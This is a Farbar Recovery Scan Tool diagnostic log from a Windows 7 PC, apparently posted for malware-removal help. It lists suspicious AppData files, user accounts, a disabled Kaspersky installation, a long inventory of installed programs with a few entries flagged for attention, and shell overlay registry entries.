2017-10-13 17:33 - 2017-10-13 17:33 - 000000001 _____ () C:\Users\MrEidrian\AppData\Local\RawCopy.1.10.agreement
2017-10-13 17:34 - 2017-10-14 16:48 - 000000001 _____ () C:\Users\MrEidrian\AppData\Local\RawCopy.sourcedisk.index
2019-09-01 08:28 - 2019-09-14 09:29 - 000722944 _____ () C:\Users\MrEidrian\AppData\Local\sha.db
2019-09-01 08:28 - 2019-09-01 08:28 - 001895383 _____ () C:\Users\MrEidrian\AppData\Local\Statlux.bin
2019-09-01 08:28 - 2019-09-01 08:27 - 001489920 _____ (NA) C:\Users\MrEidrian\AppData\Local\Toplam.exe
2019-09-01 08:28 - 2019-09-01 08:28 - 000072787 _____ () C:\Users\MrEidrian\AppData\Local\Toplam.tst
2019-09-01 08:28 - 2019-09-01 08:28 - 000032038 _____ () C:\Users\MrEidrian\AppData\Local\uninstall_temp.ico

==================== SigCheck ===============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2019-09-16 17:29
==================== End of FRST.txt ============================
10

y el addition

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-10-2019 02
Ran by MrEidrian (18-10-2019 12:02:04)
Running from C:\Users\MrEidrian\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2012-06-07 11:26:52)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-3862230028-3041123482-801023079-500 - Administrator - Disabled)
HomeGroupUser$ (S-1-5-21-3862230028-3041123482-801023079-1004 - Limited - Enabled)
Invitado (S-1-5-21-3862230028-3041123482-801023079-501 - Limited - Enabled)
MrEidrian (S-1-5-21-3862230028-3041123482-801023079-1000 - Administrator - Enabled) => C:\Users\MrEidrian
Noelia (S-1-5-21-3862230028-3041123482-801023079-1002 - Administrator - Enabled) => C:\Users\Noelia

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Kaspersky Internet Security (Disabled - Out of date) {C3113FBF-4BCB-4461-D78D-6EDFEC9593E5}
AS: Kaspersky Internet Security (Disabled - Up to date) {7870DE5B-6DF1-4BEF-ED3D-55AD9712D958}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky Internet Security (Disabled) {FB2ABE9A-01A4-4539-FCD2-C7EA1246D49E}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\uTorrent) (Version: 3.3.2.30180 - BitTorrent Inc.)
4K Video Downloader 4.5 (HKLM\...\{180B9AE1-F87B-4107-8C68-4265E927D6A8}) (Version: 4.5.0.2482 - Open Media LLC)
ACDSee Pro 5 (HKLM-x32\...\{35E0BA9D-3AFE-402A-99CA-D94FE1E73D18}) (Version: 5.0.110 - ACD Systems International Inc.)
Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Dreamweaver CS6 (HKLM-x32\...\{A4ED5E53-7AA0-11E1-BF04-B2D4D4A5360E}) (Version: 12 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.238 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.238 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.238 - Adobe)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Premiere Pro CS6 (HKLM-x32\...\{7176B973-6011-43C1-AEBC-2D73FE7C6982}) (Version: 6.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)
Advanced Office Password Recovery (HKLM-x32\...\{930A9725-1D77-4F59-A53A-11D5540207A5}) (Version: 6.32.1622.4165 - Elcomsoft Co. Ltd.)
AIDA64 Extreme Edition v2.85 (HKLM-x32\...\AIDA64 Extreme Edition_is1) (Version: 2.85 - FinalWire Ltd.)
Alien Skin Blow Up 3 (HKLM\...\Alien Skin Blow Up 3) (Version:  - Alien Skin)
Alien Skin Exposure 5 (HKLM\...\Alien Skin Exposure 5) (Version:  - Alien Skin)
AMD Catalyst Install Manager (HKLM\...\{1E9871B6-7C44-9A3A-A1C0-F9729663C7F5}) (Version: 8.0.915.0 - Advanced Micro Devices, Inc.)
Anti-Twin (Installation 10/06/2019) (HKLM-x32\...\Anti-Twin 2019-06-10 17.30.31) (Version:  - Joerg Rosenthal, Germany)
Aplicación para detectar Winamp (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Apple Application Support (32 bits) (HKLM-x32\...\{C1BCFECF-6EC2-4750-9072-5E2489423F8F}) (Version: 7.5 - Apple Inc.)
Apple Application Support (64 bits) (HKLM\...\{B202C7F5-7DE3-4FBF-B259-E70E625F56FC}) (Version: 7.5 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B5A46811-3612-4DA5-8A5A-E6DED5D7C523}) (Version: 12.2.1.12 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
aTube Catcher (HKLM-x32\...\aTube Catcher) (Version: 2.9.1462 - DsNET Corp)
aTube Catcher versión 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Avidemux 2.6 - 64bits (HKLM-x32\...\Avidemux 2.6 - 64bits (64-bit)) (Version: 2.6.5.8897 - )
Backup and Sync from Google (HKLM\...\{768C0072-2FD2-4934-9824-B2A1E81AEA5D}) (Version: 3.45.5545.5747 - Google, Inc.)
Bamboo (HKLM\...\Pen Tablet Driver) (Version: 5.2.5-5 - Wacom Technology Corp.)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Belkin USB Wireless Adaptor (HKLM-x32\...\{549CE1BD-88E4-4C5E-BF75-B155624714CC}) (Version: 1.0.0.10 - Belkin) Hidden
Belkin USB Wireless Adaptor (HKLM-x32\...\InstallShield_{549CE1BD-88E4-4C5E-BF75-B155624714CC}) (Version: 1.0.0.10 - Belkin)
bl (HKLM-x32\...\{2A075BB4-E976-4278-BF3F-E5C6945D84C0}) (Version: 1.0.0 - Your Company Name) Hidden
Boilsoft Video Joiner 5.22 (HKLM-x32\...\Boilsoft Video Joiner_is1) (Version:  - Boilsoft, Inc.)
Boilsoft Video Joiner 6.57 (HKLM-x32\...\{FD39EF4B-0B5C-4B33-8D57-2EE865A80EB1}_is1) (Version:  - Boilsoft, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Box Sync (64 bit) (HKLM\...\{C1135974-554F-476D-B04F-0B79CFE49364}) (Version: 3.4.25.0 - Box, Inc)
calibre 64bit (HKLM\...\{3A089BB3-2CED-49B7-9B12-9AF5F623405E}) (Version: 0.9.9 - Kovid Goyal)
Camtasia Studio 7 (HKLM-x32\...\{53FA9A9F-3C19-4D43-AD6B-DEF365D469BA}) (Version: 7.0.0 - TechSmith Corporation)
Catalogador 2007 (HKLM-x32\...\Catalogador) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.61 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.4.2.3442 - CDBurnerXP)
CloudNet (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
CPUID CPU-Z 1.64.0 (HKLM\...\CPUID CPU-Z_is1) (Version:  - ) <==== ATTENTION
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.45.4.0314 - DT Soft Ltd)
Desinstalación de CopyTrans Control Center solamente (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\CopyTrans Suite) (Version: 4.100 - WindSolutions)
Dfine 2.0 (HKLM-x32\...\Dfine 2.0 Stand-Alone) (Version: 2.1.0.7 - Nik Software, Inc.)
Diablo III (HKLM-x32\...\Diablo III) (Version:  - Blizzard Entertainment)
Driver Sweeper versión 3.2.0 (HKLM-x32\...\{5A67D2EA-FB70-4033-A6F3-606AD85B2015}_is1) (Version: 3.2.0 - Phyxion.net)
EaseUS Data Recovery Wizard 9.5 (HKLM\...\EaseUS Data Recovery Wizard 9.5_is1) (Version:  - EaseUS)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
EssentialPIM Pro (HKLM-x32\...\EssentialPIM Pro) (Version: 5.54 - Astonsoft Ltd)
Evernote v. 4.6.6 (HKLM-x32\...\{6146B9DC-C33D-11E2-BDE1-984BE15F174E}) (Version: 4.6.6.8360 - Evernote Corp.)
Exact Audio Copy 1.3 (HKLM-x32\...\Exact Audio Copy) (Version: 1.3 - Andre Wiethoff)
Excel Password Recovery Lastic 1.2 (HKLM-x32\...\Excel Password Recovery Lastic_is1) (Version:  - )
Excel Password Recovery Lastic 1.3 (Usuario actual) (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Excel Password Recovery Lastic_is1) (Version:  - )
Express Rip, extractor de CD (HKLM-x32\...\ExpressRip) (Version: 1.98 - NCH Software)
FileZilla Client 3.6.0 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0 - FileZilla Project)
Flickr Uploadr 3.2.1 (HKLM-x32\...\Flickr Uploadr) (Version:  - )
FotoPrix FotoLibro v4 (HKLM-x32\...\{2FEC2258-5F07-400B-82AE-232510ED187D}) (Version: 6.10.0049 - FotoPrix, S.A.)
Free AVI MPEG WMV MP4 FLV Video Joiner 5.0.2 (HKLM-x32\...\Free AVI MPEG WMV MP4 FLV Video Joiner_is1) (Version:  - FreeAudioVideoSoftTech, Inc.)
Free Video Flip and Rotate version 2.1.9.827 (HKLM-x32\...\Free Video Flip and Rotate_is1) (Version: 2.1.9.827 - DVDVideoSoft Ltd.)
Gadwin PrintScreen (HKLM-x32\...\Gadwin PrintScreen) (Version: 4.7 - Gadwin Systems, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 76.0.3809.132 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.24.7 - Google Inc.) Hidden
GoPro Studio 2.0.0 (HKLM-x32\...\GoPro Studio) (Version: 2.0.0 - WoodmanLabs Inc. d.b.a. GoPro)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
HDD Regenerator (HKLM-x32\...\{2445981B-A23B-4A0E-AD15-3D391BDAEC3E}) (Version: 1.71.0012 - Abstradrome)
HDR Efex Pro (HKLM-x32\...\HDR Efex Pro) (Version: 1.2.0.0 - Nik Software, Inc.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Helicon Focus 5.3.7 (HKLM-x32\...\Helicon Focus_is1) (Version:  - Helicon Soft Ltd.)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
Herramienta de descarga USB/DVD de Windows 7 (HKLM-x32\...\{266F443F-A296-406F-9EE8-DF4A1061C6CE}) (Version: 1.0.30 - Microsoft Corporation)
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.0.3.300 - Huawei Technologies Co.,Ltd)
Hofmann 12.0.0.11 (HKLM-x32\...\{FAF6DF16-51F8-4A8A-B3B2-D349A5FD491F}) (Version: 12.0.0 - Hofmann)
I Am Alive (HKLM-x32\...\{62952508-8C6F-4D31-9802-099FC67B41C3}) (Version: 1.00.0 - Ubisoft) Hidden
I Am Alive (HKLM-x32\...\InstallShield_{62952508-8C6F-4D31-9802-099FC67B41C3}) (Version: 1.00.0 - Ubisoft)
Imagenomic Noiseware 5.0 Plug-in (build 5007) (HKLM\...\ImagenomicNoisewarePlugin) (Version:  - )
Instalable DNIe (HKLM\...\{B4A6EF31-AC22-4BE2-A714-581FC66DBFAF}) (Version: 13.0.0 - Cuerpo Nacional de Policía)
iTunes (HKLM\...\{4699F245-9592-4D3A-A0A1-6D4152E9F49B}) (Version: 12.9.5.7 - Apple Inc.)
Java 8 Update 171 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180171F0}) (Version: 8.0.1710.11 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
JDownloader 0.9 (HKLM-x32\...\5513-1208-7298-9440) (Version: 0.9 - AppWork GmbH)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Junk Mail filter update (HKLM-x32\...\{FECB76C1-1C1D-4A84-8D47-5754C74B5A5E}) (Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Kaspersky Internet Security 2013 (HKLM-x32\...\{560985FB-4B76-4121-9189-7A2CDC7886D6}) (Version: 13.0.1.4190 - Kaspersky Lab) Hidden
Kaspersky Internet Security 2013 (HKLM-x32\...\InstallWIX_{560985FB-4B76-4121-9189-7A2CDC7886D6}) (Version: 13.0.1.4190 - Kaspersky Lab)
Kastor - Tube To Mp3 V 2.99 (HKLM-x32\...\{87C334CF-063A-4AEA-B523-1DE04014BA19}_is1) (Version: 2.99.95.0 - KastorSoft)
K-Lite Codec Pack 9.9.5 (Basic) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 9.9.5 - )
Kutools for Excel 18.00 (HKLM-x32\...\{A095BA43-4A97-4D55-8E25-A0BC46F10765}_is1) (Version: 18.00 - Addin Technology Inc.)
League of Legends (HKLM-x32\...\{C3342033-211F-40DD-A03D-0E775B8DEA98}) (Version: 3.0.1 - Riot Games) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
Los Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.0.615 - Electronic Arts)
M3 RAW Drive Recovery version 5.6.8 (HKLM-x32\...\{F354E53A-879C-4F1B-9D4A-DB8A6B986F46}}_is1) (Version: 5.6.8 - M3 Data Recovery)
Malwarebytes versión 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Microsoft .NET Framework 4.7.2 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft .NET Framework 4.7.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Chart Controls for Microsoft .NET Framework 3.5 (KB2500170) (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.30730.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{4FFA2088-8317-3B14-93CD-4C699DB37843}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
MixPad, mezclador de archivos de audio (HKLM-x32\...\MixPad) (Version:  - NCH Software)
Mozilla Firefox 68.0.2 (x64 es-ES) (HKLM\...\Mozilla Firefox 68.0.2 (x64 es-ES)) (Version: 68.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 68.0.2.7164 - Mozilla)
Mp3tag v2.54 (HKLM-x32\...\Mp3tag) (Version: v2.54 - Florian Heidenreich)
Mumble 1.2.3 (HKLM-x32\...\{1B325F86-1AD4-45AC-B011-078CB02CC3A2}) (Version: 1.2.3 - Thorvald Natvig)
Nero 7 Premium (HKLM-x32\...\{CF097717-F174-4144-954A-FBC4BF301034}) (Version: 7.02.9753 - Nero AG)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
Nitro Pro (HKLM\...\{9651FF7E-0DB1-4388-ADE7-017E4B9C9D47}) (Version: 11.0.3.134 - Nitro)
NMSDVDX64 v1.1 (HKLM\...\{49C4A807-A535-4E85-BD6D-5A7803473CA3}) (Version: 1.01.0001 - FOTOPRIX)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.6.3 - Notepad++ Team)
Opera Stable 63.0.3368.71 (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Opera 63.0.3368.71) (Version: 63.0.3368.71 - Opera Software)
Pando Media Booster (HKLM-x32\...\{980A182F-E0A2-4A40-94C1-AE0C1235902E}) (Version: 2.6.0.7 - Pando Networks Inc.)
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
PDF To JPG Converter 2.0.2 (HKLM-x32\...\PDF To JPG Converter_is1) (Version:  - PDF To JPG Converter)
Perfect Effects 8 (HKLM-x32\...\{C982ACFF-5997-4B7D-B3E1-CF7273A06FB2}) (Version: 8.1.0 - onOne Software)
Perfect Photo Suite 5.5.1 (HKLM-x32\...\{59679381-3F22-4A40-A7AD-890242D74DF4}) (Version: 5.5.1 - onOne Software)
ph (HKLM-x32\...\{185F9795-9663-4F13-9EF9-307A282ADB5A}) (Version: 1.0.0 - Your Company Name) Hidden
PTLens (HKLM-x32\...\{33F26F06-5989-49D0-8C83-691776349E0D}) (Version: 1.0.1040 - ePaperPress)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6662 - Realtek Semiconductor Corp.)
Realterm 2.0.0.70_SignedWrapper (HKLM-x32\...\Realterm) (Version: 2.0.0.70_SignedWrapper - Broadcast Equipment)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.30.0 - Renesas Electronics Corporation) Hidden
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.30.0 - Renesas Electronics Corporation)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.59.0 - Samsung Electronics Co., Ltd.)
Skype™ 6.13 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.13.104 - Skype Technologies S.A.)
Software de impresora EPSON (HKLM\...\EPSON Printer and Utilities) (Version:  - SEIKO EPSON Corporation)
Software Logitech para juegos 8.45 (HKLM\...\Logitech Gaming Software) (Version: 8.45.88 - Logitech Inc.)
SpyHunter 5 (HKLM-x32\...\SpyHunter5) (Version: 5.6.1.119 - EnigmaSoft Limited)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
Twixtor 5, After Effects-compatible plugin set (HKLM-x32\...\Twixtor 5, After Effects-compatible plugin set) (Version:  - )
UltraISO Premium V9.53 (HKLM-x32\...\UltraISO_is1) (Version:  - )
Vegas Pro 12.0 (64-bit) (HKLM\...\{7AF65840-6575-11E2-ACDF-F04DA23A5C58}) (Version: 12.0.486 - Sony)
VideoPad Video Editor (HKLM-x32\...\VideoPad) (Version: 5.01 - NCH Software)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN)
WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 6.33 - NCH Software)
WBFS Manager 3.0 (HKLM-x32\...\WBFS Manager 3.0) (Version: 3.0 - AlexDP)
WebTablet FB Plugin (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.0.0.1 - Wacom Technology Corp.)
WebTablet IE Plugin (HKLM-x32\...\Wacom WebTabletPlugin for IE) (Version: 1.1.0.12 - Wacom Technology Corp.)
WebTablet Netscape Plugin (HKLM-x32\...\Wacom WebTabletPlugin for Netscape) (Version: 1.1.0.10 - Wacom Technology Corp.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.63  - Nullsoft, Inc)
Windows Driver Package - Dirección General de la Policía (UMPass) SmartCard  (10/04/2015 1.0.2.4) (HKLM\...\8511265726450F16617C484913A433A328D3D65C) (Version: 10/04/2015 1.0.2.4 - Dirección General de la Policía)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
WinRAR 4.10 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.10.0 - win.rar GmbH)
WinSCP 4.2.9 (HKLM-x32\...\winscp3_is1) (Version: 4.2.9 - Martin Prikryl)
Yandex Browser (HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\YandexBrowser) (Version: 19.7.2.455 - YANDEX)
Youtube Downloader HD v. 2.9.9.42 (HKLM-x32\...\Youtube Downloader HD_is1) (Version:  - YoutubeDownloaderHD.com)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-06-27] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-06-27] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-06-27] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [000BoxDesktopFileLocked] -> {C253B817-3A00-475f-A5A3-6F2DD704B48D} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [File not signed]
ShellIconOverlayIdentifiers: [000BoxDesktopNotSynced] -> {19ACC806-F7AA-46AA-A80A-726A07CA6637} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [File not signed]
ShellIconOverlayIdentifiers: [000BoxDesktopNotSyncedCollabs] -> {337D9DE0-3F8B-4430-AF0F-FFC24A95AE8F} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [File not signed]
ShellIconOverlayIdentifiers: [000BoxDesktopSynced] -> {B7AC9C6D-F15B-4B1A-A88D-F518D13861D9} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [File not signed]
ShellIconOverlayIdentifiers: [000BoxDesktopSyncedCollab] -> {9E48C232-F601-4E41-BB3E-16CBAF317AA4} => C:\Program Files\Box Sync\BoxIconOverlayHandler.dll [2013-06-07] (Box, Inc.) [File not signed]
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-14] (Mega Limited -> )
